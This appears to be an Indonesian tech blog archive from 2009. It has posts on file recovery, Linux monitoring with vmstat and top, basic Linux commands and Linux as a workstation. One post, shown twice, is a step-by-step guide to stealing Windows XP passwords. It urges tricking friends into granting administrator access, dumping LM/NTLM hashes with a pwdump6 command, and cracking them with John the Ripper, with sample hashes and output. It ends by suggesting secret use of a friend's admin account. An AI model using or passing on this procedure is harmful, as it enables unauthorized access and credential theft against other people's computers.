Anda Pernah kehilangan data yang berharga atau yang penting?gak usah bingung -bingung untuk mengembalikannya. Restoration File salah satunya. Cara yang termudah untuk melakukan pengembalian data-data yang hilang bisa menggunakan software yang bisa me-restore file-file yang telah di hapus baik yang melalui recycle bin maupun langsung dari windows. Software tersebut juga bisa melakukan recover untuk foto-foto dari flash card yang terformat.
Hal pertama yang dilakukan dari software ini adalah mencari data-data yang telah dihapus dari user dalam partisi harddisk tertentu. Jadi sebaiknya software ini ditaruh dimasing-masin partisi harddisk baik harddisk berformat NTFS maupun FAT.
Untuk menjalankan program ini diperlukan authorities user sebagai administrator dengan cara mengklik kanan restoration file application dan klik "Run as Administrator". Dan juga freeware ini tidak memerlukan penginstallan dalam menjalankan program tersebut dan juga software ini beroperasi sendiri/standalone. Inilah alasan mengapa direkomendasikan untuk menaruh restoration file di setiap partisi harddisk.
Kekurangan dalam freeware ini adalah mempunyai kapasitas recovery capabilities yang limited sehingga tidak semua file dapat di restore. Dan juga tampilan dari software ini pun kurang menarik. Tetapi cukup simpel untuk dimengerti.
Sumber :www.beritanet.com
Read More..
Rabu, 30 Desember 2009
Selasa, 29 Desember 2009
Hack Windows XP (SP2) Passwords
Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun seperti Cain, L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdump6 dan john the ripper. Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :
Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.
Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :
pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.
A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file
Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.
Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. :-D. Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari sini atau download dari mirror situs saya disini.
1. Jalankan CMD (Run->cmd)
2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)
D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1
pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.
3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :
ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::
4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.
Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :
D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)
Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.
Administrator:1+Administrator:2 = adminkeren123
Sedangkan untuk user “coba” adalah “mudahditebak”!!
Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.
Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!
Read More..
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :
Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.
Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :
pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.
A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file
Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.
Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. :-D. Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari sini atau download dari mirror situs saya disini.
1. Jalankan CMD (Run->cmd)
2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)
D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1
pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.
3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :
ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::
4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.
Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :
D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)
Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.
Administrator:1+Administrator:2 = adminkeren123
Sedangkan untuk user “coba” adalah “mudahditebak”!!
Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.
Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!
Read More..
Jumat, 18 Desember 2009
Bagaimana memonitor sistem Linux
Menganalisis sistem biasanya dilakukan oleh seorang administrator sistem untuk mendeteksi adanya gejala-gejala yang dapat menyebabkan kerusakan atau masalah pada sistem kelak. RedHat sudah menyediakan tool-tool untuk melakukan hal itu, diantaranya adalah dua buah program tool yang sangat berguna yaitu vmstat dan top, dengan menggunakan kedua program tersebut administrator memperoleh informasi mengenai sistem seperti penggunaan CPU, memori atau proses-proses yang sedang berjalan dan dengan bantuan informasi ini administrator sistem bisa mendeteksi secara cepat apakah sistemnya mengalami gangguan atau tidak.Dengan menggunakan kedua program tersebut, Anda sendiri bisa mencoba dan melihat apakah sistem yang dipakai saat ini berjalan dengan baik atau tidak. Lihatlah informasi yang ditampilkan program-program tersebut dan bila Anda memperkirakan ada masalah, silakan menghubungi administrator sistem untuk mendapatkan bantuan.
vmstat
Program atau perintah ini akan melakukan test dan menampilkan informasi penggunaan CPU, memori, proses-proses yang sedang berjalan serta operasi I/O. Sintaks penulisan perintahnya adalah sebagai berikut:
$ vmstat [interval] [count]
Interval adalah waktu jeda test dalam detik dan count adalah jumlah test yang kita kehendaki. Misalnya akan dilakukan test sebanyak 5 kali dengan waktu jeda setiap 5 detik maka perintah dan hasilnya adalah seperti dibawah ini:
[zakaria@linux source]$ vmstat 5 5
procs memory swap io system cpu
r b w swpd free buff cache si so bi bo in cs us sy id
0 0 0 37924 824 840 13280 54 14 30 9 522 271 21 6 73
3 0 0 37924 1080 816 13060 0 0 1 0 110 329 20 16 64
1 0 0 37924 1036 824 13084 0 0 2 1 130 331 18 18 64
1 0 0 37924 1036 824 13084 0 0 0 0 107 329 19 16 65
2 0 0 37924 1036 828 13084 0 0 0 1 112 326 21 14 65
Tiga kolom pertama menunjukkan proses-proses yang sedang dikerjakan, yaitu waiting for runtime(r), uninterupted sleep(b) dan swapped out(w). Banyaknya proses yang mengalami waiting for runtime(r) dapat merupakan indikasi terjadinya suatu masalah misalnya telah terjadi bottleneck yaitu penumpukan proses-proses disuatu tempat.
Kolom memory dan swap digunakan untuk mendeteksi adanya kesalahan yang ditimbulkan oleh manajemen memori. Kolom-kolom swpd, free, buff dan cache berturut-turut menjelaskan jumlah memori virtual yang digunakan, jumlah memori idle, jumlah memori yang dipakai sebagai buffer dan jumlah memori yang tersisa dalam cache, semuanya dalam KB. Perhatikan kolom swap in(si), merupakan jumlah memori yang di-paging dari disk dalam satuan KB/detik sedangkan swap out(so) adalah kebalikannya.
Tiga kolom terakhir adalah persentasi penggunaan CPU yaitu persentasi penggunaan CPU untuk tugas-tugas user(us), persentasi penggunaan CPU untuk tugas-tugas sistem termasuk waktu tunggu I/O, pelaksanaan fungsi-fungsi sistem operasi secara umum(sy) dan persentasi CPU idle atau saat tidak digunakan(id). Untuk mendeteksi suatu kesalahan yang diakibatkan oleh masalah CPU sebaiknya dengan melihat persentasinya secara signifikan dalam satu periode waktu. Misalnya pada saat komputer idle dalam satu periode waktu, perhatikan kolom us dan sy seharusnya menunjukkan angka yang rendah sedangkan kolom id menunjukkan angka yang tinggi. Bila tidak seperti itu maka dipastikan ada masalah yang berkaitan dengan CPU.
top
Menampilkan informasi proses yang sedang dilakukan CPU secara real time. Kelebihan dari top ini adalah kita dapat memanipulasi proses-proses tersebut secara interaktif dengan menekan tombol-tombol menu. Misalnya untuk meng-kill sebuah proses, kita cukup menekan tombol K dan mengisi nomor proses(PID) yang ingin di-kill.
Untuk menjalankannya cukup dengan mengetikkan perintah top dan segera ditampilkan daftar proses-proses yang sedang berjalan saat itu berikut informasi-informasi lainnya. Informasi-informasi yang ditampilkan tersebut secara default akan diperbarui atau diupdate setiap 5 detik. Berikut ini tampilan sebagian dari daftar proses-proses yang ditunjukkan oleh top:
Baris-baris header menampilkan informasi mengenai waktu, jumlah user, banyaknya proses, penggunaan CPU serta memori secara jelas. Misalnya saat itu sistem memiliki 35 buah proses, dimana 4 proses sedang berjalan, 30 proses sleeping dan ada sebuah proses menjadi zombie. Porses zombie ini adalah sebuah proses yang hang atau hidup segan, mati tak mau (Ronny Haryanto, giant@canada.com) dan apabila Anda tidak bisa mem-kill proses zombie ini maka parent process-nya harus di-kill lebih dahulu. Gunakan perintah pstree atau ps ufx untuk mengurut proses mana yang menjadi parent dari zombie tersebut.
Daftar menu untuk mengoperasikan top dapat dilihat dengan menekan tombol ?, atau h. Dengan menggunakan tombol-tombol dalam daftar menu tersebut, kita dapat melakukan manipulasi semua proses dalam sistem. Misalnya, tombol k untuk meng-kill sebuah proses, tombol r untuk me-renice proses dan q untuk keluar atau mengakhiri progam top.
Read More..
vmstat
Program atau perintah ini akan melakukan test dan menampilkan informasi penggunaan CPU, memori, proses-proses yang sedang berjalan serta operasi I/O. Sintaks penulisan perintahnya adalah sebagai berikut:
$ vmstat [interval] [count]
Interval adalah waktu jeda test dalam detik dan count adalah jumlah test yang kita kehendaki. Misalnya akan dilakukan test sebanyak 5 kali dengan waktu jeda setiap 5 detik maka perintah dan hasilnya adalah seperti dibawah ini:
[zakaria@linux source]$ vmstat 5 5
procs memory swap io system cpu
r b w swpd free buff cache si so bi bo in cs us sy id
0 0 0 37924 824 840 13280 54 14 30 9 522 271 21 6 73
3 0 0 37924 1080 816 13060 0 0 1 0 110 329 20 16 64
1 0 0 37924 1036 824 13084 0 0 2 1 130 331 18 18 64
1 0 0 37924 1036 824 13084 0 0 0 0 107 329 19 16 65
2 0 0 37924 1036 828 13084 0 0 0 1 112 326 21 14 65
Tiga kolom pertama menunjukkan proses-proses yang sedang dikerjakan, yaitu waiting for runtime(r), uninterupted sleep(b) dan swapped out(w). Banyaknya proses yang mengalami waiting for runtime(r) dapat merupakan indikasi terjadinya suatu masalah misalnya telah terjadi bottleneck yaitu penumpukan proses-proses disuatu tempat.
Kolom memory dan swap digunakan untuk mendeteksi adanya kesalahan yang ditimbulkan oleh manajemen memori. Kolom-kolom swpd, free, buff dan cache berturut-turut menjelaskan jumlah memori virtual yang digunakan, jumlah memori idle, jumlah memori yang dipakai sebagai buffer dan jumlah memori yang tersisa dalam cache, semuanya dalam KB. Perhatikan kolom swap in(si), merupakan jumlah memori yang di-paging dari disk dalam satuan KB/detik sedangkan swap out(so) adalah kebalikannya.
Tiga kolom terakhir adalah persentasi penggunaan CPU yaitu persentasi penggunaan CPU untuk tugas-tugas user(us), persentasi penggunaan CPU untuk tugas-tugas sistem termasuk waktu tunggu I/O, pelaksanaan fungsi-fungsi sistem operasi secara umum(sy) dan persentasi CPU idle atau saat tidak digunakan(id). Untuk mendeteksi suatu kesalahan yang diakibatkan oleh masalah CPU sebaiknya dengan melihat persentasinya secara signifikan dalam satu periode waktu. Misalnya pada saat komputer idle dalam satu periode waktu, perhatikan kolom us dan sy seharusnya menunjukkan angka yang rendah sedangkan kolom id menunjukkan angka yang tinggi. Bila tidak seperti itu maka dipastikan ada masalah yang berkaitan dengan CPU.
top
Menampilkan informasi proses yang sedang dilakukan CPU secara real time. Kelebihan dari top ini adalah kita dapat memanipulasi proses-proses tersebut secara interaktif dengan menekan tombol-tombol menu. Misalnya untuk meng-kill sebuah proses, kita cukup menekan tombol K dan mengisi nomor proses(PID) yang ingin di-kill.
Untuk menjalankannya cukup dengan mengetikkan perintah top dan segera ditampilkan daftar proses-proses yang sedang berjalan saat itu berikut informasi-informasi lainnya. Informasi-informasi yang ditampilkan tersebut secara default akan diperbarui atau diupdate setiap 5 detik. Berikut ini tampilan sebagian dari daftar proses-proses yang ditunjukkan oleh top:
Baris-baris header menampilkan informasi mengenai waktu, jumlah user, banyaknya proses, penggunaan CPU serta memori secara jelas. Misalnya saat itu sistem memiliki 35 buah proses, dimana 4 proses sedang berjalan, 30 proses sleeping dan ada sebuah proses menjadi zombie. Porses zombie ini adalah sebuah proses yang hang atau hidup segan, mati tak mau (Ronny Haryanto, giant@canada.com) dan apabila Anda tidak bisa mem-kill proses zombie ini maka parent process-nya harus di-kill lebih dahulu. Gunakan perintah pstree atau ps ufx untuk mengurut proses mana yang menjadi parent dari zombie tersebut.
Daftar menu untuk mengoperasikan top dapat dilihat dengan menekan tombol ?, atau h. Dengan menggunakan tombol-tombol dalam daftar menu tersebut, kita dapat melakukan manipulasi semua proses dalam sistem. Misalnya, tombol k untuk meng-kill sebuah proses, tombol r untuk me-renice proses dan q untuk keluar atau mengakhiri progam top.
Read More..
Rabu, 16 Desember 2009
Basic Command / Perintah Dasar dalam Linux
Berbekal dengan Howto yang kamu cetak, kamu telah berhasil menginstall Distro pertamamu dengan mulus. Jika kamu menginstall X-Windows, maka kamu akan memiliki pilihan-pilihan untuk mengklik icon-icon yang ada dan mencoba mengetahui apa fungsi dari icon-icon tersebut. Namun bagaimana jika kamu tidak menginstall X-Windows? Kamu akan dihadapkan dengan prompt untuk login.
"Apa yang harus saya lakukan setelah login di Linux?"
"Bagaimana untuk melihat isi harddisk di dalam Linux?"Pertanyaan-pertanyaan di atas adalah pertanyaan yang mungkin paling sering ditanyakan oleh para newbie setelah mereka berhasil menginstall Linux. Oleh karena itu, artikel ini bertujuan untuk membantu kamu untuk memulai petualangan Linuxmu yang pertama.
Perintah Linux beserta kegunaannya
cd x atau cd /x == masuk ke direktori x
cd .. atau cd ../ atau cd/.. == pindah ke direktori satu level di bawah
x lalu [tab] [tab] == berguna untuk mengetahui perintah apa saja yang tersedia yang berawalan huruf x
adduser == untuk menambahkan user baru
ls atau dir == untuk melihat isi suatu direktori
cat == untuk melihat isi dari suatu file text
mv x y == untuk memindahkan atau merename file x ke file y
cp x y == untuk mengkopi file x ke file y
rm x == untuk menghapus file x
mkdir x == untuk membuat direktori x
rmdir x == untuk menghapus direktori x
rm -r x == untuk menghapus direktori x beserta seluruh isinya
rm p == untuk menghapus paket tertentu
df atau df x == untuk mengetahui space kosong dalam device x
top == untuk mengetahui status memori (tekan q untuk quit)
man x == untuk mengetahui keterangan manual dari suatu perintah
less x == untuk melihat isi dari suatu file text
echo x == untuk mencetak isi dari suatu file x ke screen
mc == untuk menghidupkan Norton Commander dalam Linux (sangat berguna dan memudahkan bagi newbie)
mount == untuk menghidupkan suatu device spt cdrom
halt == untuk shutdown
reboot atau [ctl + alt + del] == untuk reboot
chmod == untuk mengubah permission suatu file
ls -l x == untuk melihat isi suatu direktori secara rinci
ln -s x y == untuk membuat link dari suatu file x ke file y
find x -name y -print == untuk menemukan file y, dengan mencari mulai dari direktori x dan tampilkan hasilnya pada layar
ps == untuk melihat seluruh proses yang sedang berjalan
kill x == untuk mematikan proses x (x adalah PID di dalam ps)
[alt] + F1 - F7 == untuk berpindah dari terminal 1 - 7 (ciri khas Linux)
lilo == untuk membuat boot disk
startx == untuk menjalankan X-Windows
[ctl] + [alt] + [backspace] == untuk keluar dari X-Windows jika terjadi trouble
[ctl] + [alt] + F1 - F6 == untuk pindah dari satu terminal ke terminal lain dalam X-Windows
xf86Config == untuk mengeset X (primitif) dalam text mode
Xconfigurator == sama seperti di atas
Read More..
"Apa yang harus saya lakukan setelah login di Linux?"
"Bagaimana untuk melihat isi harddisk di dalam Linux?"Pertanyaan-pertanyaan di atas adalah pertanyaan yang mungkin paling sering ditanyakan oleh para newbie setelah mereka berhasil menginstall Linux. Oleh karena itu, artikel ini bertujuan untuk membantu kamu untuk memulai petualangan Linuxmu yang pertama.
Perintah Linux beserta kegunaannya
cd x atau cd /x == masuk ke direktori x
cd .. atau cd ../ atau cd/.. == pindah ke direktori satu level di bawah
x lalu [tab] [tab] == berguna untuk mengetahui perintah apa saja yang tersedia yang berawalan huruf x
adduser == untuk menambahkan user baru
ls atau dir == untuk melihat isi suatu direktori
cat == untuk melihat isi dari suatu file text
mv x y == untuk memindahkan atau merename file x ke file y
cp x y == untuk mengkopi file x ke file y
rm x == untuk menghapus file x
mkdir x == untuk membuat direktori x
rmdir x == untuk menghapus direktori x
rm -r x == untuk menghapus direktori x beserta seluruh isinya
rm p == untuk menghapus paket tertentu
df atau df x == untuk mengetahui space kosong dalam device x
top == untuk mengetahui status memori (tekan q untuk quit)
man x == untuk mengetahui keterangan manual dari suatu perintah
less x == untuk melihat isi dari suatu file text
echo x == untuk mencetak isi dari suatu file x ke screen
mc == untuk menghidupkan Norton Commander dalam Linux (sangat berguna dan memudahkan bagi newbie)
mount == untuk menghidupkan suatu device spt cdrom
halt == untuk shutdown
reboot atau [ctl + alt + del] == untuk reboot
chmod == untuk mengubah permission suatu file
ls -l x == untuk melihat isi suatu direktori secara rinci
ln -s x y == untuk membuat link dari suatu file x ke file y
find x -name y -print == untuk menemukan file y, dengan mencari mulai dari direktori x dan tampilkan hasilnya pada layar
ps == untuk melihat seluruh proses yang sedang berjalan
kill x == untuk mematikan proses x (x adalah PID di dalam ps)
[alt] + F1 - F7 == untuk berpindah dari terminal 1 - 7 (ciri khas Linux)
lilo == untuk membuat boot disk
startx == untuk menjalankan X-Windows
[ctl] + [alt] + [backspace] == untuk keluar dari X-Windows jika terjadi trouble
[ctl] + [alt] + F1 - F6 == untuk pindah dari satu terminal ke terminal lain dalam X-Windows
xf86Config == untuk mengeset X (primitif) dalam text mode
Xconfigurator == sama seperti di atas
Read More..
Bekerja dengan Linux
Mungkin kita familiar dengan kata-kata Linux, Unix, RedHat, SuSe, Slackware dan sebagainya yang sekarang ini sering kita dengar kalau kita berbicara masalah Teknologi Informasi terutama Teknologi Internet. Kata-kata tersebut mungkin terkesan "wah" atau esklusif bagi orang-orang yang memang belum mengetahuinya. Apalagi terutama kalau kebetulan teman kita menguasai salah satu dari "kata-kata" diatas. Kita mungkin terkagum-kagum dengan teman kita itu, "wah jago bener nih.." itu mungkin yang sering terlintas dalam pikiran kita.
Apa bener teman kita itu jago banget :) atau kita-nya yang males belajar sesuatu yang bisa dibilang tidak baru juga. Sebelum kita kategorikan Linux, kita coba cari tahu makhluk apakah yang namanya Linux itu?.Secara garis besar Linux adalah sebuah sistem operasi komputer, yg sebelumnya kita mungkin sering pakai sistem operasi bernama windows, dos, mac dab sebagainya. Saya disini tidak ingin berbicara panjang lebar tentang Linuxnya, sudah banyak tulisan yg membahas tentang Linuxnya itu sendiri.
Linuxnya itu sendiri berbagai macam distronya. Distro?, Apakah distro itu?. Distro bisa kita sebut paket atau pemaketan, karena inti dari masing2x Linux (kernel) dari masing2x distro itu adalah sama, yang berbeda adalah cara atau bagaimana pemaketannya.
Banyak ragamnya distro Linux, diantaranya Red Hat, SuSe, Slackware, Mandrake, Debian juga tidak ketinggalan distro produk dalam negeri kita sendiri, seperti Trustik Merdeka, Software RI dan sebagainya. (Untuk pembahasan distro dalam negeri sudah dibahas di edisi sebelumnya).
Untuk mudahnya kita bagi dua kategori pemakain Linux, yaitu sebagai Server dan sebagai Wokstation. Mungkin ada juga yg menambahkan kategori Linux sebagai Mobile OS (karena Linux bisa diinstall di Ponsel, PDA dan juga Notebook).
Linux sebagai Server
Linux sebagai server sudah banyak kita dengar, karena rata2x kalau kita mendengar kata Linux maka identik dengan server. Memang tidak ada salahnya, karena sebagian besar server Internet yg dipergunakan sebagai Web Server berbasiskan Linux. Kenapa? Kenapa sebagian besar orang memilih Linux sebagai Web Server?. Mungkin akan kita bahas lain kali.
Untuk sekarang kita membahas Linux sebagai Workstation
Linux sebagai Workstation
Kalau kita melihat tema paragrap diatas, Linux sebagai Workstation, diantara kita pasti ada yg menjawab "Mana mungkinnnnnn....!!!!" :) Ya jawaban seperti itu tidak aneh kalau kita dengar dan bagi orang2x yang belum mengenal begitu jauh tentang Linux. Kalau saya bilang bekerja dengan Linux -dalam arti sebagai workstation -adalah mungkin sekali. Semua aplikasi yang biasa kita pergunakan - di sistem operasi lain -sehari hari, kebanyakan sudah ada versi Linuxnya. Yang membedakan mungkin vendor pembuatnya, dan yang asyiknya adalah kebanyakan berlisensii GPL (General Public License) alias GRATIS!!! untuk di download dan dicoopy ulang..
